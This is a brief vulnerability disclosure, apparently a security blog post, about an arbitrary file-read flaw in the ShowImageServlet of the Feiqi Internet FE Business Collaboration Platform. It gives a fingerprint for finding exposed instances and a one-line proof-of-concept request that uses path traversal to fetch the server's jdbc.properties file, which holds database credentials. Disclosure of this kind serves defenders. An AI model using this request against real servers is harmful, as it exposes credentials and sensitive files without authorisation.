Feiqi Internet Fe Business Collaboration Platform Showimageservlet Arbitrary File Reading Vulnerability
Feiqi Internet Fe Business Collaboration Platform Showimageservlet Arbitrary File Reading Vulnerability
Feiqi Internet FE Business Collaboration Platform ShowImageServlet Arbitrary File Reading Vulnerability
Vulnerability Description
Feiqi Internet FE Business Collaboration Platform ShowImageServlet interface has arbitrary file reading vulnerability, and attackers can obtain sensitive files in the server through the vulnerability.
Vulnerability Impact
FeiQi Internet FE Business Collaboration Platform
Network surveying and mapping
“flyrise.stopBackspace.js”
Vulnerability reappears
Login page
Verify POC
1
/servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print
This post is licensed under CC BY 4.0 by the author.